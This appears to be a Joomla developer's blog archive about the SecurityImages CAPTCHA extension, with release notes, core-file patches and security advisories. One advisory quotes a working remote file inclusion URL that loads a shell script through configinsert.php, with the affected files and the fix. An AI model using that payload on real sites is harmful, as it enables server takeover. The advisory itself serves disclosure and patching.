jed

Jed may refer to: read more at WikiPedia

  • software_bugs_dilbert

    Thanks to Margus Pala, a security Flaw has been reported and corrected in SecurityImages version 5.1.2 and previous

    The flaw is of moderate level, in register forms, spammers are able to register without solving the Captcha!

    • It affect only SecurityImages 5.x for Joomla! 1.5
    • SecurityImages 6.x for Joomla! 1.6 is not affected

    In order to resolve this issue, you don’t have to install any new version of SecurityImages, you must either

    • Update your blog with the right version of the joomla! patches, the all end with Joomla_1.5.x-Stable-Full_PackageForSecurityImages5.y.z_v01.03.00

    OR

    • Edit the file components\com_user\controller.php and remove the line 274 ($this->register())
    if ($useSecurityImagesInRegister && !$this->checkSecurityImagesCaptcha()) {
      JError::raiseWarning('', JText::_('SECURITYIMAGES REJECT USER ENTRY'));  
      $this->register();
      return false;
    }

    These patches versions have the flaw

    04/12/2008  Joomla_1.5.1-Stable-Full_PackageForSecurityImages5.0.0.zip
    05/01/2008  Joomla_1.5.2-Stable-Full_PackageForSecurityImages5.0.0_v01.00.00.zip
    05/01/2008  Joomla_1.5.3-Stable-Full_PackageForSecurityImages5.0.0_v01.00.00.zip
    07/10/2008  Joomla_1.5.4-Stable-Full_PackageForSecurityImages5.0.0_v01.00.00.zip
    08/03/2008  Joomla_1.5.5-Stable-Full_PackageForSecurityImages5.0.0_v01.00.00.zip
    08/03/2008  Joomla_1.5.6-Stable-Full_PackageForSecurityImages5.0.0_v01.00.00.zip
    08/19/2008  Joomla_1.5.6-Stable-Full_PackageForSecurityImages5.1.0_v01.00.00.zip
    09/13/2008  Joomla_1.5.7-Stable-Full_PackageForSecurityImages5.0.0_v01.00.00.zip
    09/20/2008  Joomla_1.5.7-Stable-Full_PackageForSecurityImages5.1.0_v01.00.00.zip
    11/11/2008  Joomla_1.5.8-Stable-Full_PackageForSecurityImages5.0.0_v01.00.00.zip
    01/19/2009  Joomla_1.5.8-Stable-Full_PackageForSecurityImages5.1.0_v01.01.00.zip
    01/19/2009  Joomla_1.5.9-Stable-Full_PackageForSecurityImages5.1.0_v01.01.00.zip
    03/28/2009  Joomla_1.5.10-Stable-Full_PackageForSecurityImages5.1.0_v01.01.00.zip
    06/03/2009  Joomla_1.5.11-Stable-Full_PackageForSecurityImages5.1.0_v01.01.00.zip
    07/04/2009  Joomla_1.5.12-Stable-Full_PackageForSecurityImages5.1.x_v01.01.00.zip
    07/26/2009  Joomla_1.5.13-Stable-Full_PackageForSecurityImages5.1.x_v01.01.00.zip
    07/26/2009  Joomla_1.5.14-Stable-Full_PackageForSecurityImages5.1.x_v01.01.00.zip
    09/11/2009  Joomla_1.5.14-Stable-Full_PackageForSecurityImages5.1.x_v01.02.00.zip
    11/09/2009  Joomla_1.5.15-Stable-Full_PackageForSecurityImages5.1.x_v01.02.00.zip
    04/24/2010  Joomla_1.5.16-Stable-Full_PackageForSecurityImages5.1.x_v01.02.00.zip
    04/24/2010  Joomla_1.5.17-Stable-Full_PackageForSecurityImages5.1.x_v01.02.00.zip
    09/12/2010  Joomla_1.5.18-Stable-Full_PackageForSecurityImages5.1.x_v01.02.00.zip
    04/24/2010  Joomla_1.5.20-Stable-Full_PackageForSecurityImages5.1.x_v01.02.00.zip
    01/09/2011  Joomla_1.5.21-Stable-Full_PackageForSecurityImages5.1.x_v01.02.00.zip
    01/09/2011  Joomla_1.5.22-Stable-Full_PackageForSecurityImages5.1.x_v01.02.00.zip
    01/09/2011  Joomla_1.5.23-Stable-Full_PackageForSecurityImages5.1.x_v01.02.00.zip

    You can download the updated versions in HERE or search the download section, type 1.5.23 for the patches for 1.5.23 for example

  • Why updating?
    • If You want to use more than one Captcha in a page.
    • If  You want Captcha in the administrator page.
    • If Your old version 3.0.8 or 4.0.1 do not work as expected
    • If you use any version < 3.0.4 which has a serious vulnerability injection.

    NEW:  Captcha can  now be used in the administrator login page
    NEW: more settings for switching On/Off securityimages into Joomla! core
    BUG: I was starting another php session with session_start()

    click read more for screenshots and details...
    NEWCaptcha can  now be used in the administrator login page


    Note:
    • I've changed the file /administrator/templates/joomla_admin/login.php (insertion of captcha line 57 ) , meaning if You use another administrator template than joomla_admin, You'll have to make the same changes in Your templates
    • I've changed the file /administrator/templates/index.php (checking the captcha challenge), this file is administrator templates independent
    • This mod do not increase the security of the administrator login page, it is more smart to read:
      Todo list for securing your site: http://www.waltercedric.com/content/view/806/102/and also
      Protecting You Mambo admin panel using htaccess: http://www.waltercedric.com/content/view/706/102/


    NEW: more settings for switching On/Off securityimages into Joomla! core
    This let You deactivate securityimages in core part of Joomla! more easily.


    Note:
    • Switching these flag to true is not ENOUGH, You need to also install a set of files (an exact copy of Joomla! file let's say in a version 1.0.11) that I have modified to support securityimages. Right now Joomla! do not allow me to do it differently.

    BUG: I was starting another php session with session_start(),
    this has cause a lot of trouble in the admin login page, and has revealed that I must better use:
    session_name( md5( $mosConfig_live_site ) );
    session_start();
    This has the potential of solving issue in Virtuemart (I have not tested it, but problem look similar)

    About Joomla core patches I provide to the community
    I do not like hacking Joomla! core file, either Joomla! Team provide a way to extends their core code on the fly   (plugins) or I may run in trouble mainly because I have to provide and maintain a patch version of some core files, it is also risky to do that (code is untrusted source even if I am a honest person)...

    In order to not overwrite any existing changes You've made in the past, all users of Joomla! should really try to use Beyond Compare, from www.scootersoftware.com. It allow to select 2 directories/zip/files, and by right clicking in windows explorer like interface compare file and merge them  in a 2 way editor (you can copy from left and to the right side of panel part of the code).With this tool, You can even make a compare with a local directory and a remote one (FTP) this let you apply release (official joomla patch 1.0.11 for example)  very easily.

    Joomla! core patches are all located in administrator\components\com_securityimages\patches\*.php so the influence on core is minimal. Read them if you want to know how to use securityimages in Your own code.

    About release management of my patches:
    • Securityimages 4.0.1 has a new  API and work only with >= JoomlaPatches1.0.11-v1.0.2
    • Securityimages 3.0.8 has the old API  and work only with <= JoomlaPatches1.0.11-v1.0.1
    • Securityimages 4.1.0 has a new  API and work only with >= JoomlaPatches1.0.11-for securityimages 4.1.0 only
    My mistake is that I did not document that at all, this is why so much users run in troubles in the past few weeks....

      

  • This new release will allow you to set a different captcha per section, as seen in screen shot below:

    securityimages5.1.2

    This new release will also have a focus on making installations easier,

    • by adding supplementary checks in the page "Check Your System"
    • by patching/un-patching Joomla! sections without overwriting any files with FTP (but hey I will change code on the fly in background as they is no better way at the moment)

    I also want to add a new API (the current one will be still available) that will allow me to use recaptcha more easily.

    Ajax would be nice to have in front end and backend, but that may be out of reach for this release.

    It is time to request new features in the forum! I will look at request and it may be part of that release...

    Release in worst case expected for end of months.

  • I did not see that I was using a feature only available in PHP5 while coding the class administrator/components/com_securityimages/classSecurityimagesSession.php(Singleton holding database connections)

    And this PHP5 and was looking at how the database connection is done in Joomla! 1.5. I am providing a patch for that that will allow all of you to run SecurityImages on PHP4 and PHP5, download SecurityImages 4.3.1

    Remember: PHP4 is discontinued:

    As mentioned in this post on PHP.net the PHP4 life cycle is finally coming to a close:

    Today it is exactly three years ago since PHP 5 has been released. In those three years it has seen many improvements over PHP 4. PHP 5 is fast, stable & production-ready and as PHP 6 is on the way, PHP 4 will be discontinued.

    &160;&160;&160; The PHP development team hereby announces that support for PHP 4 will continue until the end of this year only. After 2007-12-31 there will be no more releases of PHP 4.4. We will continue to make critical security fixes available on a case-by-case basis until 2008-08-08. Please use the rest of this year to make your application suitable to run on PHP 5.

    They also&160; link to a migration guide for users moving up from PHP4 to PHP5 including guides for the PHP 5.0 to 5.1 switch and the PHP 5.1 to 5.2 switch.

    + You can expect 25% more speed just by going to PHP5.

    &160;

    Visiting www.gophp5.org may also help in your migration
    Since the launch of GoPHP5.org, over 100 software projects and over 200 web hosts have come on board to support the adoption of PHP 5.2.

  • joomla_cms

    This is a drop in replacement for the Joomla! core module "Popular Articles", it offer the same level of features but also add thumbnails.

    • Joomla! 1.5 use mod_articles_popular_thumb_j15.zip
    • Joomla! 1.6 and above use mod_articles_popular_thumb_j15_j16.zip

    Visit the download section

    Features

    New features are in yellow

    PopularArticleswithThumbnailsforJoomla_03

    • For Joomla! 1.5/1.6/1.7
    • CSS driven output (file located at media/mod_articles_popular_thumb/css.css), feel free to submit changes, alternate CSS layout.
    • Use Joomla caching for best performances,
    • Thumbnails width and height can be specified,
    • Thumbnails are automatically extracted from the text introduction. If no image is found, a default picture can be defined
    • You can switch off separately the title, text teaser and thumbnails,
    • The length of the text teaser and ending (»/…/ read more) can be modified in the administrator panel,
    • It is based on the code of the internal Joomla! core module mod_mostread.

    Notes

    This module use TimThumb 2.8.0 that must be installed as a Joomla! library

    TimThumb is a simple, flexible, PHP script that resizes images. You give it a bunch of parameters, and it spits out a thumbnail image that you can display on your site.

    Example of output

    With title, text teaser or only with thumbnails. Any combinations is possible.

    PopularArticleswithThumbnailsforJoomla_01 PopularArticleswithThumbnailsforJoomla_00 PopularArticleswithThumbnailsforJoomla_02

  • An insight at securityimages 5.2.0 still in development, as usual, all comments are welcome either in this post or in my forum

    NEW: fonts are now auto detected, and a better widget is now available for selecting them, sorry still no font preview in php ;-)

    font.autodetection

    You can install your own true type fonts at /administrator/components/com_securityimages/fonts
    This replace the combo box which was prone to user entries errors...
    not.user.friendly

    NEW: More fine grained control on the type of plugin you would like to use on a per section/category basis.
    A small captcha for the login module, and a bigger one or a totally different rendering algorithm in register for example.

    NEW: A check to avoid some user choosing plugin/version combinations that do not exist..

    check.newPanelControl

    NEW: A new API for recaptcha/ existing section that make integration a lot more easier. Old API still available for backward compatibilities.

    NEW: Sound! developed for securityimages AND also will be also committed to Joomla Comment trunk.

    SecurityImages create audible CAPTCHA codes as WAV files by combining sound files of each letter and number that appears in the character set.

    • A feature that has taken 3 years to be integrated...
    • It increase the component size by 320kb !
    • It can only speak English at the moment...
    • It can not speak special character (#%&)

    AJAX: start of a POC which allow captcha to be checked asynchronously without needing submit of whole page. This is a major complain since the beginning of SecurityImages, as currently users lost their entries in the form in case the captcha challenge get refused. I will try to use JQUERY/XAJAX

  • com_securityimages joomla_1.5open.qa.logo

    I've done my homework today, in order to insured the
    release quality and avoid manual testing of SecurityImages
    at every release, I release Selenium testcases so anybody/
    any developer can run them against their homepage.

     

    Prerequisites

    • Extract this zip file in a new directory (link soon available)
    • Load the test suite (set of tests) named securityimages.testsuite
      seleniumSecurityImages5
    • Take care at the Base URL, in test suite I use http://localhost/T1 put the right base of course, for example http://www.yourhost.com/
      seleniumSecurityImages
    • The user login/password has to be changed to an existing user! 
      seleniumSecurityImages1 
    • SecurityImages has to be put in TEST mode. This is a new setting in administrator panel. This force SecurityImages in this mode to accept only the word "test123" as captcha response and nothing else. This is because I can not read, or find in the test case the word hidden in the picture without a lot of effort.
    • Testsuite is working only for HNcapctha at the moment.
    • You can run all test cases in the suite by clicking on seleniumSecurityImages2 or just one or two with seleniumSecurityImages3 but in that case don't forget to also always select the test InitializeTestcases.test (use ALT GR)

     

    seleniumSecurityImages4 Currently only 4 tests are not working, and this because selenium can not submit the contact and register form of Joomla! this has nothing to do with my code.

     

    The next step is to put everything in XINC...

    Read also

  • joomla_cms

    This is a drop in replacement for the Joomla! core module "Related Articles", it offer the same level of features but also add thumbnails.

    This Module displays other Articles that are related to the one currently being viewed. These relations are established by the Meta Keywords. 
    All the keywords of the current Article are searched against all the keywords of all other published Articles. For example, you may have an Article on "Breeding Parrots" and another on "Hand Raising Black Cockatoos". If you include the keyword "parrot" in both Articles, then the Related Items Module will list the "Breeding Parrots" Article when viewing "Hand Raising Black Cockatoos" and vice-versa.

    You can see this module live running here (module in top right corner)

    Attention, it is required to install the library "TimThumb for Joomla! 1.6 / 1.7" for proper operations.

    Features

    • For Joomla! 1.5/1.6/1.7
    • CSS driven output (file located at media/mod_articles_popular_thumb/css.css), feel free to submit changes, alternate CSS layout.
    • Use Joomla caching for best performances,
    • Thumbnails width and height can be specified,
    • Thumbnails are automatically extracted from the text introduction. If no image is found, a default picture can be defined
    • You can switch off separately the title, text teaser and thumbnails,
    • The length of the text teaser and ending (»/…/ read more) can be modified in the administrator panel,
    • It is based on the code of the internal Joomla! core module mod_related_items.

    Notes

    This module use TimThumb 2.8.0 that must be installed as a Joomla! library

    TimThumb is a simple, flexible, PHP script that resizes images. You give it a bunch of parameters, and it spits out a thumbnail image that you can display on your site.

    Visit the download section

  • joomla_cms

    This extension plugin displays other Articles that are related to the one currently being viewed. These relations are established by the Meta Keywords.&160;
    All the keywords of the current Article are searched against all the keywords of all other published Articles. For example, you may have an Article on "Breeding Parrots" and another on "Hand Raising Black Cockatoos". If you include the keyword "parrot" in both Articles, then the Related Items Module will list the "Breeding Parrots" Article when viewing "Hand Raising Black Cockatoos" and vice-versa.

    What’s new?

    • Tested against Joomla 1.7.0, 1.7.1 and Joomla 1.7.2
    • It use latest TimThumb library for more performances and better resizing options,
    • Joomla! Update manager let you update from 3.0.0 to 3.1.1 in one click
    • Refactoring 25% less code, more functionalities!

    and best of all new plugin outputs are available!

    Matrix

    Allow you to display a matrix of N thumbnails per lines. Post title is visible only when user hover on each pictures.&160; Use it for blog having great pictures, when you want to maximize the visual impact and if you are ready to use thumbnails at least of 140 x 140 pixels.

    Related Posts Slide Out Boxes

    Related Posts Sliding Boxes with Shuffle Function using jQuery 1.5 and CSS3.

    All credits goes to the author at http://tympanus.net/codrops/2010/07/21/related-posts-slide-out-boxes/

    New existing plugins are also soon coming!

    You can see the latest version 3.1.1 live running at demo-joomla-1.7.waltercedric.com in demo mode and download it here.

    Currently only for Joomla! 1.7, a back port of the functionality for Joomla! 1.5 is underway

  • I know that Secure, Safe, Fast Linux Hosting sound silly as nothing can be fast and secure at the same time, but I've compiled a list of things that are worth doing if you are maintaining your own server. This list is clearly targeted for people running an open source stack made of Apache, MySQL, PHP and Linux.

    This list is an ongoing work, thta is why it has also a version number in it (v1.0). As soon as I will learn new tricks, the list will be updated.

    By clicking read more, You'll be able to go through the checklist, or maybe you'll prefer the mindmap version HERE

     

  •  oups it seems (!) that protecting form with security images may be a not so good idea (it may stop a lot of spammer but not all)... As there is already some open source or closed programs to defeat them...I am convince that not all spammer will be able or want to attack site protected with images, especially user homepage. But if the site is well known (ex: Yahoo)...read below: frightening!

    PWNtcha stands for "Pretend We’re Not a Turing Computer but a Human Antagonist", as well as PWN capTCHAs. This project’s goal is to demonstrate the inefficiency of many captcha implementations.

    Anyway this page is giving me enough idea at how to tune my code to avoid/disallow/make it more difficult automatic recognition of characters...

    Among others, from this page:

    • render the characters with different colors -> I will do it, easy
    • make some characters darker than the background, and some lighter
    • use gradient colors for the backgrounds and the characters
    • dont align all the characters vertically -> Possible in current implementation
    • dont make the answers words, so that a dictionary could be used -> already random
    • use more characters and symbols -> done
    • use uppercase and lowercase characters -> already done
    • use a different number of characters each time ->done
    • rotate some of the characters more drastically (i.e. upside down) -> will try
    • do more overlapping of characters
    • Add a grid ->done
    • make some pixels of a single character not touching
    • have grid lines that cross over the characters with their same color
    • consider asking natural language questions

    Breaking a Visual CAPTCHA homepage of the Shape Contexts based approach to break Gimpy, the CAPTCHA test used at Yahoo! to screen out bots. Our method can successfully pass that test 92% of the time

  • I am currently finishing the release of security images...
    • New backgrounds (more than 24 now), You can help me by submitting random background (size 200 * 35 pixels).
    • Possibility to edit language file directly from the backend
    • The reload function all of You are waiting for
    • A better architecture in code that will allow to add new captcha engine with ease (in less than 2 hours)
    • Working with PHP5

    3 testers have receive a beta version for tests, and I am waiting on their feedbacks...



    The wiki has been updated with some screenshots

    I also may include a veriword plugin  and even a plugin randomizer function soon


  • Com security image with be shipped soon with a patch for Joomla 1.03 which also modify the login and registration process, see screenshots below....

    in module login:

    in component registration

    in component registration, lost password

    The more background, the more fonts, the difficult for a robot to do an OCR on pictures....I was thinking of doing automating search on Google images and randomize the background but Google forbid such kind of misuse of thiers services (I understand that)

  • I will also release a new version of akocomment, and resolve the logged in user bugs that many people have reported me.

    release 2.2.0 to be released soon

    • All- Security patches: add missing index.html and PHP missing header: defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );
    • Plugin core is now able to output image to PNG, JPG or GIF selection in admin core settings
    • Plugin core is now able to limit the reload tentative of the users, retry counter is stored in user session. If user reload picture more than Retry in tab Text
    • Plugin core has a new switch: Use extended charset in image: ex: +*%&/()=?!$?@#...true or false
    • Plugin core is now able to output align text in image using 4 strategies:
      System font with random character position
      TTFonts with random character position
      The best for me, OCR is more difficult
      TTFonts with linear character position
      (Default setting)
      Random Above 3 in a random order.
    • All -Patches for Login/registration Joomla framework as file in /patches/ You have either:
      • To modify joomla files manually y following steps below OR
      • Copy already patched file (Joomla 1.0.3) to the server at the right place
    • All - Bug in function getSecurityImageField($textid) the javascript was not boostraped, no influence but bug was revealed when doing login integration
    • All - General Settings: It is now possible to display selectively the reload or sound button.
    • com_contact, if user failed to enter the right captcha, he lost his data. This is not a bug but more a functionnalities not existing in Joomla -> the form with history back is always initialize with empty fileds in Mozilla Firefox, while in IE it is working
    • Plugin All - Bug if logs are activated, php code logger.php was not included into the delegate plugins/xx/yy/checker.php
    • All - New Tab in "General settings" called "Joomla-Patches" this let You swicth on or off the use of security images in login, registration.
    • Plugin core - Bug correct the contrast of 2 images bg-L-5.png and bg-L-18.png : there were too dark!
    • All -A new menu entry "Check if latest version" has been add, I only have to finish the server code.-> it is not working right now but soon.

     

    AkoComment

    Administrator mail UTF8 support patch by Karel Neugebauer jr. - http://itx.cz

     

     

    Install security images form code in existing Joomla code...

    point A Open components\com_registration\registration.html.php line 54 in function registerForm($option, $useractivation)
      <tr>
    <td>
    <?php echo _PROMPT_EMAIL; ?>
    </td>
    <td>
    <input type="text" name="confirmEmail" class="inputbox" size="40" />
    </td>
    </tr>


    <?php
    //security image by www.waltercedric.com
    global $mosConfig_absolute_path;
    if (file_exists($mosConfig_absolute_path.'/administrator/components/com_securityimages/patches/registration.lostPassForm.php')) {
    require_once($mosConfig_absolute_path.'/administrator/components/com_securityimages/patches/registration.lostPassForm.php');
    }
    //end security image by www.waltercedric.com
    ?>


    <tr>
    <td colspan="2">
    <input type="hidden" name="option" value="<?php echo $option;?>" />
    <input type="hidden" name="task" value="sendNewPass" /> <input type="submit" class="button" value="<?php echo _BUTTON_SEND_PASS; ?>" />
    </td>
    </tr>
    point B Open components\com_registration\registration.html.at line 164 in function registerForm($option, $useractivation)
      <tr>
    <td>
    <?php echo _REGISTER_VPASS; ?> *
    </td>
    <td>
    <input class="inputbox" type="password" name="password2" size="40" value="" />
    </td>
    </tr>

    <?php
    //security image by www.waltercedric.com
    global $mosConfig_absolute_path;
    if (file_exists($mosConfig_absolute_path.'/administrator/components/com_securityimages/patches/registration.html.registerForm.php')) {
    require_once($mosConfig_absolute_path.'/administrator/components/com_securityimages/patches/registration.html.registerForm.php');
    }
    //end security image by www.waltercedric.com
    ?>

    <tr>
    <td colspan="2">
    </td>
    </tr>
    point C  

     

    Install security images checking code in existing Joomla code...

    Point 1 Open \components\com_registration\registration.php after line 61 add what is in bold below
      $checkusername = mosGetParam( $_POST, 'checkusername', '' );
    $checkusername = $database->getEscaped( $checkusername );
    $confirmEmail = mosGetParam( $_POST, 'confirmEmail', '');
    $confirmEmail = $database->getEscaped( $confirmEmail );

    //securityimages by www.waltercedric.com
    global $mosConfig_absolute_path;
    if (file_exists($mosConfig_absolute_path.'/administrator/components/com_securityimages/patches/registration.SendNewPass.php')) {
    include_once($mosConfig_absolute_path.'/administrator/components/com_securityimages/patches/registration.SendNewPass.php');
    }
    //end security images by www.waltercedric.com


    $query = "SELECT id"
    Point 2 Open \components\com_registration\registration.php after line 123 (123 is after added the point 1)
      function saveRegistration( $option ) {
    global $database, $acl;
    global $mosConfig_sitename, $mosConfig_live_site, $mosConfig_useractivation, $mosConfig_allowUserRegistration;
    global $mosConfig_mailfrom, $mosConfig_fromname, $mosConfig_mailfrom, $mosConfig_fromname;

    if ($mosConfig_allowUserRegistration=='0') {
    mosNotAuth();
    return;
    }

    //securityimages by www.waltercedric.com
    global $mosConfig_absolute_path;
    if (file_exists($mosConfig_absolute_path.'/administrator/components/com_securityimages/patches/registration.SaveRegistration.php')) {
    include_once($mosConfig_absolute_path.'/administrator/components/com_securityimages/patches/registration.SaveRegistration.php');
    }
    //end security images by www.waltercedric.com

    $row = new mosUser( $database );

    if (!$row->bind( $_POST, 'usertype' )) {
    echo "<script> alert('".$row->getError()."'); window.history.go(-1); </script>\n";
    exit();
    }
    Point 3 Open includes\joomla.php after line 610
      $passwd = md5( $passwd );
    $bypost = 1;
    }
    $remember = mosGetParam( $_POST, 'remember', '' );


    //securityimages by www.waltercedric.com
    global $mosConfig_absolute_path;
    if (file_exists($mosConfig_absolute_path.'/administrator/components/com_securityimages/patches/joomla.login.php')) {
    include_once($mosConfig_absolute_path.'/administrator/components/com_securityimages/patches/joomla.login.php');
    }
    //end security images by www.waltercedric.com


    if (!$username || !$passwd) {
    echo "<script> alert(\""._LOGIN_INCOMPLETE."\"); window.history.go(-1); </script>\n";
    exit();
    } else {

       

     

  • In order to avoid spamming at any cost, I include security images in Mambo. The component (a part of hashcash) wont be released before end of the week even if it is functionnal mainly because:

    • I want to integrate this technology in the guestbook (Akobook) ->Not done yet
    • I want to integrate this technology in the administrator login page, this for avoiding brute force attack ->Not done yet
    • I want to have a beautiful backend panel, because this functionnality is highly configurable: ->Not done yet
      Ex of variables in code (not all):
      $textLength = 8;
      $useRandomSize = true;
      $textFontSizeDefualt = 14;
      $textFontSizeMin = 12;
      $textFontSizeMax = 18;
      $textFontName = "garamond.ttf";
      $useRandomTextAngle = true;
      $textAngleMin = -5;
      $textAngleMax = 5;
      $cleanupTable = "10 minutes";
    • So what is done? the commenting system of Mambo (the excellent akocomment component) is migrated.... see picture
    • A GNU/GPL release of course ;-) (for my code only, there is strong copyright on akocomment and akobook)



  • The webmaster of janwiersma.com sent me an email today
    at 6:12AM , his server was hacked because of a bug in
    securityimages. This bug allows a remote atackerto
    execute commands via remote forceful include and
    execute function on your server
    and affect ALL version of securityimages <= 3.0.5

    Here are all files which put your server at risk:
    client.php,configinsert.php,lang.php,server.php

    Example of attack:
    http://web/components/com_securityimages/
    configinsert.php?mosConfig_absolute_path=http://shell.txt
    from http://securityreason.com/exploitalert/892
    Secunia has also a report on it: http://secunia.com/product/11186/
    In fact I forget to use that line in these files:
    defined('_VALID_MOS') or die('Direct Access to this location is not allowed.');
    This avoid any requests to access directly this file. 

    - upgrade to 3.0.6 (download at Joomla Forge or in my download sections) OR
    - patch the faulty files by hand (add defined('_VALID_MOS') or die('Direct Access to this location is not allowed.');at the beginning of each file)

    Please also contact all Your friends which are using securityimages!

    And for my other components?

    Hashcash 1.2.X is also affected: http://secunia.com/product/11046/  and my patch is avalaible!

    - upgrade to 1.2.2  (download at Joomla Forge or in my download sections) OR
    - patch the faulty files by hand (add defined('_VALID_MOS') or die('Direct Access to this location is not allowed.');at the beginning of each file)

    JoomlaCloud is NOT affected





    YOU ARE ALL URGE TO UPGRADE ASAP!

  • release soon

    • Depending on settings in admin panel, the logic was reversed for "Display or not the reload button" and "Display or not the sound button (function not implemented)"
    • Remove "image content-type" settings it is not needed -> provide a select boy with gif, jpg, png output possibility instead
    • Logs are now database based. with a query engine to search a specific spam attempt.
    • Logs can be export to CSV, HTML, XML
    • Better localization in admin panel, more keys in english.php
    • Add /manuals directory with a manual on how to install securityimages in login, registration
    • A file selector (can be reused GPL) for selecting background pictures to be used
    • More background
    • New language file brazilian_portuguese.php courtesy of Fernando B. (http://developer.joomla.org/sf/global/do/viewUser/ferjoom )
  • Has been released at Joomla Forge, see details here

    • New: A new About page
    • New: A new developer page for people wanting to use this framework
    • New: a new troubleshooting page
  •  Maintenance releases
    • BUG: captha combo box is now Joomla, Mambo CSS aware class="inputbox"
    • BUG: affecting array of font was not working and lead to a corrupt array in plugin core 1.1
    • BUG: HNCAPTCHA O, o I and i and 1 impossible to read...
      This is not due to the random Text Generator but more to one font rubberst.ttf, get rid of it in
      the "hncaptcha core admin panel". Remember the more fonts the more difficult to hack it with OCR robots.
    • NEW add czech translation


  • One way to crack CAPTCHA  is to offer a free porn site which requires that the user  key in the solution to a captcha -- which has been inlined from my site for example -- before he can gain access. Free porn images or video attract a lot of users around the clock and in many countries.
    SecurityImages 3.0.5 try to solve this issue by adding a text in the generated picture.

    • NEW: Hncaptcha 1.0 has been modified
    • NEW:Core 1.1 has been modified
    Download it at Joomlaforge or in my download section



  • I am back online...my notebook crashed last week and was promptly replaced by Hewlett Packard and the new hard disk died one day after being renewed...and as usual, a lot of backup (powerquest v2i protector), but I was not able to restore them, as it seems that my disk was silently dying since weeks , and "check backup afterward for consistency" is not checked as default. I work yesterday 3 hours on securityimages, and test it with a new secure PHP4 installation.

    OpenCommentis also currently tested, I am removing uneeded functionnality (not fully developed or tested), as soon as it work, I will deploy it to http://demo.waltercedric.com. I hope to be able to use it here on my homepage before end of next week...So all Beta tester are welcome (Colin :-))

    Click read more to see what has changed in securityimages 4.0.0





    Securityimages 4.0.0 release "enhanced Security "

    This version is now running with:
    • PHP.ini safe mode OFF 
    • Joomla RG Global Emulation O 
    • PHP.ini register global = Off
    I' will also in the future only develop with that PHP settings, so that will mean more securities for all  users and host running my code.

    Bugs solved:
    artf4021: php safe mode & com_securityimages
    artf1411: Save setting button changes if config.securiyimages.php is not writable
    artf4989: register_globals Off patch
    artf3206: com_contact
    artf2777: No text displayed in security Image  

    API  changes
    Will work only with new release of akcomment, akobook, etc...

    securityimages < 4.0.0
    in PHP <form>

    <?php include ($mosConfig_absolute_path.'/administrator/components/com_securityimages/client.php'); ?>
    <?php echo insertSecurityImage("security_refid"); ?>
    <?php echo getSecurityImageText("security_try"); ?>
    <?php echo getSecurityImageTextHeader(); ?> 
    <?php echo getSecurityImageTextHelp(); ?>
    <?php echo getSecurityImageField("security_try"); ?> 
     

    The code above insert the image, and the text, You page normally submit information to the server for processing. Most of the time, the last 2 lines are inserted in a <form>

    in PHP code checking the <form>

    include ($mosConfig_absolute_path.'/administrator/components/com_securityimages/server.php');

    $checkSecurity = checkSecurityImage($security_refid, $security_try);

    if $checkSecurity = true //then the user has entered the right text.



    securityimages >= 4.0.0 Introducing a captcha hidden field visibility name
    in PHP <form> include($mosConfig_absolute_path.'/administrator/components/com_securityimages/client.php');
    $packageName = 'securityimage_newpass';
     echo "<tr><td>".getSecurityImageTextHeader()." *</td><td>".insertSecurityImage($packageName)."<br/>".getSecurityImageTextHelp()."".getSecurityImageField($packageName)."</td></tr>";
    in PHP code checking the <form> $securityimage_newpass_refid     = mosGetParam( $_POST, securityimage_newpass_refid', '' );
    $securityimage_newpass_try     = mosGetParam( $_POST, 
    securityimage_newpass_try', '' );
    $securityimage_newpass_reload     = mosGetParam( $_POST, '
    securityimage_newpass_reload', '' );         
    include_once ($mosConfig_absolute_path.'/administrator/components/com_securityimages/server.php');
    $checkSecurity &= checkSecurityImage($securityimage_newpass_refid, $securityimage_newpass_try, $securityimage_newpass_reload);


    New!
    HNCAPTCHA: now color background is fully configurable








  • Use only this version, it replace the buggy release 4.0.0. it has all the promise o the 4.0.0, with less bugs :-)



    Note, You will have to download the component com_securityimages4.0.1.zip AND replace Joomla! core file with the patch JoomlaPatches1.0.11-v1.0.2.zip

    Files are in my download section.
     
  • BUG: links to downloadable Joomla patches change from Joomla Forge to www.waltercedric.com
    NEW: a new plugin watercap
    NEW: possibility to remove the backlink to this site in admin panel.
    BUG: akocomment switch for activating securityimage was the same as akobook switch

    Following has been done to resolve common issues support in forum.
    NEW: better detection of GD library and warnings if not detected during installation
    NEW: error message if GD is not detected instead of a broken image during runtime.

    Thanks to Lukas Wymann
    BUG: "Switch component OFF globally" and "Switch component to debug" switch were exchanged
    BUG: constant $copyright not initialized in 2 places, $refreshlink not created
    BUG: missing files calculator.jpg in installer

    To be release in a few hours

    Do not forget that GD library is required, 90% of forums entries are related to this issues.

    GD is an open source code library for the dynamic creation of images by programmers. GD creates PNG, JPEG and GIF images, among other formats. GD is commonly used to generate charts, graphics, thumbnails, and most anything else, on the fly. While not restricted to use on the web, the most common applications of GD involve web site development. from http://www.libgd.org/

    How to install GD
    SecurityImages manual
  • Visit my download section to grab the latest version of securityimages 4.2.1

    NEW
    /BUG Better compatibility of session handling with SMF Bridge/FacileForms
    NEW: Dutch translations courtesy of Henk von Pickartz, aka Boswachter - http://boswachter.free.fr
    BUG: links to downloadable Joomla patches change from Joomla Forge to www.waltercedric.com
    NEW: a new plugin watercap
    NEW: possibility to remove the backlink to this site in admin panel.
    BUG: akocomment switch for activating securityimage was the same as akobook switch

    Following has been done to resolve common issues support in forum.
    NEW: better detection of GD library and warnings if not detected during installation
    NEW: error message if GD is not detected instead of a broken image during runtime.

    Thanks to Lukas Wymann
    BUG: "Switch component OFF globally" and "Switch component to debug" switch were exchanged
    BUG: constant $copyright not initialized in 2 places, $refreshlink not created
    BUG: missing files calculator.jpg in installer
  • Thanks to jaylenongin my forums, a security concern in securityimages 4.2.1 has been found and corrected.

    It is recommended to use SecurityInmages 4.2.2, download it HERE